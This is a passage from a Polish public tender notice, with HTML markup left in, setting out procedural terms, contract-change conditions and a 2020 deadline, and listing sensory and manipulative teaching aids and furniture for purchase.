PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">W terminie 3 dni od dnia zamieszczenia na stronie internetowej Zamawiającego informacji, o której mowa w art. 86 ust. 5 ustawy Pzp., Wykonawca składa w oryginale oświadczenie o przynależności albo braku przynależności do tej samej grupy kapitałowej z Wykonawcami, którzy złożyli oferty w przedmiotowym postępowaniu. W przypadku przynależności do tej samej grupy kapitałowej z Wykonawcami, którzy złożyli oferty w przedmiotowym postępowaniu, Wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu. Wzór oświadczenia podany jest w Załączniku nr 4 do SIWZ. Wraz z ofertą Wykonawca składa aktualne na dzień składania ofert oświadczenia w zakresie wskazanym przez Zamawiającego w ogłoszeniu o zamówieniu oraz w niniejszej SIWZ, stanowiące wstępne potwierdzenie, że Wykonawca spełnia warunki udziału w postępowaniu zgodnie ze wzorem stanowiącym Załącznik nr 2 do SIWZ oraz że nie podlega wykluczeniu w postępowaniu zgodnie ze wzorem stanowiącym Załącznik nr 3 do SIWZ. 2. Wykonawca, który powołuje się na zasoby innych podmiotów, zamieszcza informacje o tych podmiotach w oświadczeniach, o których mowa w ust 1, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim Wykonawca powołuje się na zasoby innych podmiotów, warunków udziału w postępowaniu. 3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie stanowiące wstępne potwierdzenie że wykonawca nie podlega wykluczeniu zgodnie ze wzorem oświadczenia stanowiącego Załącznik nr 3 do SIWZ, podpisane przez osoby upoważnione do reprezentacji danego Wykonawcy, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. </span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp"></span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1.	Zmiany treści Umowy mogą być dokonywane wyłącznie w formie aneksu podpisanego przez obie Strony, pod rygorem nieważności w zakresie:1)	zmiany terminu wykonania Umowy (skrócenie/wydłużenie) lub terminów płatności z uwagi na wstrzymanie/przerwanie wykonania przedmiotu Umowy z przyczyn zależnych od Zamawiającego lub niezależnych od Wykonawcy;2)	wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację Umowy - w zakresie dostosowania postanowień Umowy do zmiany przepisów prawa;3)	wystąpienia siły wyższej (Siła wyższa - zdarzenie lub połączenie zdarzeń obiektywnie niezależnych od Stron, które zasadniczo i istotnie utrudniają wykonywanie części lub całości zobowiązań wynikających z Umowy, których Strony nie mogły przewidzieć i którym nie mogły zapobiec ani ich przezwyciężyć i im przeciwdziałać poprzez działanie z należytą starannością ogólnie przewidzianą dla cywilnoprawnych stosunków zobowiązaniowych) - w zakresie dostosowania Umowy do tych zmian;4)	zmniejszenia zakresu realizacji Przedmiotu Umowy, w przypadku wystąpienia zmiany okoliczności powodującej, że:a)	realizacja części Przedmiotu Umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawierania Umowy,b)	realizacja części Przedmiotu Umowy nie jest możliwa, z przyczyn nieleżących po stronie Zamawiającego i Wykonawcy, przy odpowiednim zmniejszeniu wynagrodzenia należnego Wykonawcy.2.	Zmiany, o których mowa w ust. 1, nie mogą spowodować zwiększenia całkowitej wartości wynagrodzenia brutto.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-01-08</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">11:30</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Zakup i dostawę pomocy dydaktycznych: kącik manipulacyjno-sensoryczny</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lp.	Nazwa Ilość	Jedn.	Opis przedmiotu zamówienia1	Woreczki sensoryczne z okienkiem	3	kpl	6 woreczków, gdzie każdy wypełniony jest innym materiałem. Dodatkowo każdy woreczek posiada okienko przez, które można zobaczyć jaki materiał znajduje się w środku, jak wygląda. W każdym woreczku są ukryte skarby, które trzeba znaleźć2	Dyski sensoryczne. Duży zestaw	3	szt.	Zestaw sensorycznych dysków, które pobudzają i rozwija zmysł dotyku zarówno dłoni jak i stóp. Podczas zabaw, w tym samym czasie, rozwija się zdolność do opisywania wrażeń zmysłowych. Tarcze dotykowe wykonane z miłej w dotyku gumy syntetycznej, zawierają różne struktury dotykowe, każda z własnym kolorem.3	Zestaw do masażu	1	szt.	Kompletny zestaw do masażu sensorycznego, wraz z koszem do jego przechowywania. Wałki do masażu i miękkie pędzle.Stymulacja i eksploracje dotykowe.Eleganckie i naturalne gładkie drewno brzozowe.4	Sensoryczne klucze	3	szt.	Zestaw kilkudziesięciu filcowych kolorowych kluczy oraz 7 drewnianych wzorników (rozmiar jednego wzornika 32 cm x 32 cm) o różnym stopniu trudności do wspomagania rozwoju manipulacji i spostrzegawczości wzrokowej. Zadaniem dziecka jest dopasować klucz do odpowiedniego kształtu w różnych konfiguracjach (ułożenie pionowe, ułożenie skośne, ułożenie poziome).5	Skrzynka Zgadula	3	szt.	Włóż zabawki do skrzynki, zamknij ją i spróbuj odgadnąć używając jedynie zmysłu dotyku i słuchu jaki przedmiot trzymasz w ręku.6	Piłka do tulenia	3	szt.	Ściskaj miękką piłkę w której istnieją luki aby umożliwić umieszczenie rąk i ramion wewnątrz, zapewniając dodatkowy komfort i ciepło. Zmniejszy również niepokój i zapewni uspokojenie u dzieci nadpobudliwych.7	Zestaw piłek sensorycznych	3	kpl	Zestaw piłek – 1 dużej i pięciu małych o różnej fakturze i kolorystyce do zabawy razem lub oddzielnie, w wielu kombinacjach dla dzieci w wieku 6 m-cy - 4 lata *każda piłka wykonana jest inaczej i zachowuje się inaczej, wywołując odmienne doznania dotykowe * wymiary ok. : 16,5cm x 18,2cm x 17,8cm8	Sensoryczne kafelki	1	kpl	Sensoryczna kafelki to wspaniałe wizualne i dotykowe doświadczenie, które naprawdę zachęca do poruszania się i badania jej powierzchni. Płytki są wypełnione płynem kosmetycznym (nietoksycznym), są całkowicie zamknięte. Gruba warstwa ochronna jest wysoce odporna na zarysowania i ścieranie. Wytrzymają każdą ilość skoków! Mogą być również stosowane na blacie stołu i płaskiej powierzchni. Każda płytka o powierzchni 30 x 30 cm.Zestaw zawiera cztery płytki o różnych kolorach. Materiał: PVC, PE, woda z kolorowym płynem kosmetycznym9	Magnetyczne emocje	1	szt.	Zestaw 6 magnetycznych ludzików. Każdy ludzik składa się z 5 części, które łączą się ze sobą magnesami. Każda głowa, twarz ludzika wyraża inną emocję: radość, smutek, gniew, zaskoczenie, zdezorientowanie, i przerażenie. Zabawka ta pomaga rozwijać umiejętność rozpoznawania i rozumienia emocji. Emocje są również powiązane z kolorami. 30-częściowy zestaw zawiera 2 niebieskie, 2 żółte i 2 czerwone kulki(twarze), drążki, koszule oraz buty. Zestaw zawiera również wymienne fryzury.10	Worek rozciągliwy	1	szt.	Worek do ćwiczenia poprawy napięcia mięśniowego, siły, wytrzymałości, stymulowania czucia głębokiego ciała - propriocepcji, a także wyciszenia i relaksu.Wym. ok. 101cm x 68cm, kolor: niebieski11	Kolumna bąbelkowa 120 cm	2	szt.	Automatyczna zmiana kolorów, bąbelki a w zestawie również wypełnienie w postaci pływających rybek.Kolumna bąbelkowa ma średnicę 10 cm a jej wysokość to 120cm.12	Taśma do ćwiczeń oporowych 1,5 m	30	szt.	Taśmy o długości 1,5 m dostępne są w kolorach: - żółtym - taśma najsłabsza;- czerwonym - taśma słaba;- zielonym - taśma średnia;- niebieskim - taśma mocna;- czarnym - taśma najmocniejsza (po 6 szt. z każdego koloru)13	Kamień do skakania	3	szt.	Nowa wersja kamienia rzecznego, zawiera miękką podstawę i twardą platformę podpartą trzema mocnymi stalowymi sprężynami, umożliwiającymi odbijanie.Ćwiczy koordynację ruchową, równowagę oraz gibkość.14	Mała misa do balansowania	3	szt.	Plastikowa miska może służyć jako kołyska, fotel lub taboret. Można w niej usiąść, lub na nią wejść.15	Deska motoryczna	3	szt.	Deska do huśtania to zabawka motoryczna do ćwiczenia równowagi i koncentracji, wyposażona po bokach w miejsca do stania. Zabawa polega na znalezieniu równowagi po wejściu na "huśtawkę" delikatnym huśtaniu się (balansowaniu ciałem) i prowadzeniu piłek po torze do celu ze strony lewej na prawę i z powrotem. - od spodu deska wyposażona jest w miękką antypoślizgową wypustkę, - co zapewnia bezpieczeństwo podczas zabawy- w zestawie deska + 2 kolorowe kulki o średnicy 30mm- zabawka przeznaczona dla dzieci powyżej 5 lat- wymiary ok.: 70 x 20 x 6 cm- materiał: drewno brzozowe16	Kącik manipulacyjny - Miasteczko	3	szt.	Aplikacja, którą można zaaranżować cały kącik do zabaw manipulacyjnych. Wyposażona jest w rozmaite elementy wspierające rozwój małej motoryki u maluchów; labirynt ślimakowy, falisty, żłobienia, po których można wodzić paluszkiem, zaznaczając kształt okien, drzwi czy cyferek na zegarze.Zegar wyposażony jest w ruchome wskazówki, co oprócz zaznajamiania z jego funkcjonowaniem pozwala także ćwiczyć znajomość cyferek. Szeleszczące elementy w dwóch wyróżniających się na tle naturalnej sklejki odcieniach zieleni są dodatkowym bodźcem służącym ogólnemu rozwojowi.Ruchomy motylek, ptaszek, biedronka czy kółka samochodu zaciekawią maluszka, zachęcą do manipulacji usprawniając tym samym sprawność manualną rączek.Centralne miejsce przeznaczone jest na duże, bezpieczne lustro, w którym dziecko lub nawet kilkoro dzieci może się przyglądać własnemu odbiciu oraz towarzyszącym mu obrazom.17	Zręcznościowa pajęczyna	3	szt.	Zabawa polega na zdobyciu jak największej ilości punktów, które zdobywa się za celny rzut kolorowym pająkiem w pajęczynę.Im bliżej pająk znajdzie się pajęczyny tym więcej punktów dla zawodnika.Zabawka wykonana z drewna bambusowego. Wym. ok. 38 x 8 x 38 cm18	Zestaw klocków sensorycznych	1	szt.	W zestawie znajdziesz 16 dużych drewnianych klocków, które mają kolorowe okienka z wykonane z akrylu. A w środku: koraliki, kolorowy piasek i wodę z brokatem! Klocki są w 4 różnych kształtach: półkole, kwadrat, trójkąt i prostokąt. Rozmiar prostokąta ok. 14 cm x 7cm x 4 cm.19	Trzy sensoryczne piłki	1	kpl	Zestaw trzech piłek, każda z nich posiada unikalną powierzchnie (gładka, gładkie wypustki, ostre wypustki) oraz wypełnienie (duże kuleczki, małe kuleczki, piasek). Każda z nich jest przezroczysta a więc widać wypełnienie. W każdej z piłek w jej wypełnieniu jest ukryty wąż. Musisz tak manipulować wypełnieniem aby dotrzeć do węża. Każda piłka posiada wentyl dzięki czemu możesz regulować ilość powietrza. Podczas zabawy mamy możliwość nauki komunikacji opisując podobieństwa i różnice. Piłki idealnie nadają się do ćwiczenia percepcji wzrokowej jak i percepcji dotykowej. Produkt świetnie sprawdza się w terapii ręki.20	Duży zestaw do treningu zapachowego/węchowego owoce	1	szt.	W skład zestawu wchodzi ok. 15 owocowych zapachów. 8 zapachów wyciszających oraz 7 zapachów pobudzających, 30 kart oraz drewniana skrzynka. Każdy zapach posiada dwie karty, jedna karta przedstawia owoc w całości a druga karta owoc przepołowiony. Zestaw daje wiele możliwości do ćwiczeń z dziećmi 21	Aplikacja żółw	1	szt.	Kolorowe aplikacje z płyty MDF, do zamocowania na ścianę. Stanowi zarówno dekorację sali, jak również panel manipulacyjny usprawniający motorykę ręki dziecka.• wym. ok. 68 x 60,8 cm22	Ścianka manipulacyjna - labirynt	1	szt.	Podzielona na dwie części tablica przeznaczona jest do ćwiczeń manipulacyjnych i doskonalenia koordynacji wzrokowo-ruchowej. Ściankę wyposażono w dwa typy labiryntów, po których dziecko może przesuwać kolorowy krążek, ćwicząc motorykę dłoni i nadgarstki. Ścianka zabezpieczona pleksi! Kulka podąża za magnetycznym pisakiem - ćwiczenie chwytu pęsetkowego. Wym. ok.: 139 x 86 cm<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>39162000-5, 39162110-9, 39162200-7<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2020-02-07<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena </td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin płatności faktury </td><td style="border: 1px solid black;border-collapse: collapse;">30,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Aspekty społeczne</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Zakup i dostawa mebli </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lp.	Nazwa Ilość	Jedn.	Opis przedmiotu zamówienia1	Zestaw meblowy typu Quadro 75,90 St 1	szt.	• wym. ok. 275 (szer) x 41,5 (gł) cm, meble wykonane z płyty laminowanej w tonacji klonu (korpus) oraz białej (przegrody i półki) o gr. 18 mm, fronty o gr. 18 mm pokryte trwałą okleiną termoplastyczną. Opis składników zestawu: • - szeroka szafka wisząca 